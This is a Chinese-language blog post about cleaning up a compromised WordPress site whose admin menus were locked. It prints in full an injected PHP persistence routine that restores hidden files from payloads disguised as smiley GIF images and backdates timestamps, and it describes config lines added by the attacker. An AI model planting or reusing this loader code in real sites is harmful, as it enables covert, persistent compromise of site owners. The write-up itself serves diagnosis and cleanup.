wordpress 后台菜单点击的时候提示没有权限

2023-10-14 23:09:46

记录一次在后台操作的时候没有权限,当鼠标移动上去的时候没反应:

wordpress 后台菜单点击的时候提示没有权限

 

 这部分完全的不显示,强制输入连接,直接提示没有权限
wordpress 后台菜单点击的时候提示没有权限

 

 初步的判断是有人设置的角色的部分,经过查找wordpress中没有单独设置权限的部分。

然后觉的可能是什么插件影响, 然后禁用所有的插件,然而,还是一动不动的。

 

直接进入到服务器进行查看,发现是多了个两个奇怪的文件夹 

wordpress 后台菜单点击的时候提示没有权限

 

 进入文件夹查看,发现不是正经的文件

wordpress 后台菜单点击的时候提示没有权限

 

 

然后根据文件名进行查找:

grep -rnl coreq

发现还把其他的文件也进行了修改

wordpress 后台菜单点击的时候提示没有权限

 

图片的文件是进行伪装, 两个php文件中果然是写了东西

//ck1bg
$nowFileDir =  ‘coreq‘;
$nowHtacFile =  ‘./coreq/.htaccess‘;
$nmbf1 =  ‘./coreq/template.html‘;
$nowIndexFile =  ‘./coreq/index.php‘;
$nowLogFile =  ‘./coreq/logs.txt‘;
$bkLocalFileIndex1 =  ‘./wp-includes/images/smilies/icon_reds.gif‘;
$bkLocalFileHtac1 =  ‘./wp-includes/images/smilies/icon_blacks.gif‘;
$bkLocalFileMoban1 =  ‘./wp-includes/images/smilies/icon_greens.gif‘;
^M
if($nowHtacFile && file_exists($bkLocalFileHtac1)){^M
        if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){^M
                if(!is_dir("./$nowFileDir")){^M
                        @mkdir("./$nowFileDir",0755);^M
                }^M
                @chmod($nowHtacFile,0755);^M
                @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1));^M
                @chmod($nowHtacFile,0755);^M
        }^M
}^M
^M
^M
if(file_exists($bkLocalFileIndex1)){^M
        if(!file_exists($nowIndexFile) or (filesize($nowIndexFile) != filesize($bkLocalFileIndex1) && !file_exists($nowLogFile))){^M
                if(!is_dir("./$nowFileDir")){^M
                        @mkdir("./$nowFileDir",0755);^M
                }^M
                @chmod($nowIndexFile,0755);^M
                @file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex1));^M
                @chmod($nowIndexFile,0755);^M
        }^M
}^M
^M
if(file_exists($bkLocalFileMoban1)){^M
        ^M
        if(!file_exists($nmbf1)){^M
                if(!is_dir("./$nowFileDir")){^M
                        @mkdir("./$nowFileDir",0755);^M
                }^M
                @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1));^M
                @chmod($nmbf1,0755);^M
        }else{^M
                if(filesize($nmbf1) != filesize($bkLocalFileMoban1)){^M
                        $tpstrMb = file_get_contents($nmbf1);^M
                        if(strstr($tpstrMb,"draft_or_post_title") && !strstr($tpstrMb,"<!--ttt html5 tttt-->")){^M
                                $fitime = filemtime($bkLocalFileMoban1);^M
                                @chmod($bkLocalFileMoban1,0755);^M
                                @file_put_contents($bkLocalFileMoban1,$tpstrMb);^M
                                @touch($bkLocalFileMoban1, $fitime, $fitime);  ^M
                        }else{^M
                                @chmod($bkLocalFileMoban1,0755);^M
                                @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1));^M
                                @chmod($bkLocalFileMoban1,0755);^M
                        }^M
                }^M
        }^M
        ^M
}
//ck1end

看变量命名,好像也不是老外写的,还能咋的, 就把对应的代码给删掉,别让继续的潜伏着,图片里面的代码就不贴了。

在做了清除之后,菜单的问题依然是没有解决。

于是开始下载新版本的wordpress进行手动更新,只要不覆盖配置文件就行,然后我还是太年轻,覆盖完了之后依然没有效果。

灵机一动,直接用新的版本,只用原来的数据库和配置文件,结果还是没有结果。

老衲已经身心疲惫,想着直接放弃算了。

于是又复制了一个正常站的配置文件,把对应的数据库的信息修改了,,,这时奇迹发生了。原来篡改的文件还有配置文件。

在配置文件的最新面发现了两行

define(‘DISALLOW_FILE_EDIT‘, true);
define(‘DISALLOW_FILE_MODS‘, true);

删掉之后果然是生效了。

 

遗留两个问题没有解决:

1.为什么只是对插件的哪里的起作用

2.最初的源头是什么,这个没有找到,还是睡不踏实。

 

 

 


 

 

wordpress 后台菜单点击的时候提示没有权限

上一篇:UIView如何优雅的自适应布局(Masonry)


下一篇:POJ 2411 状态压缩DP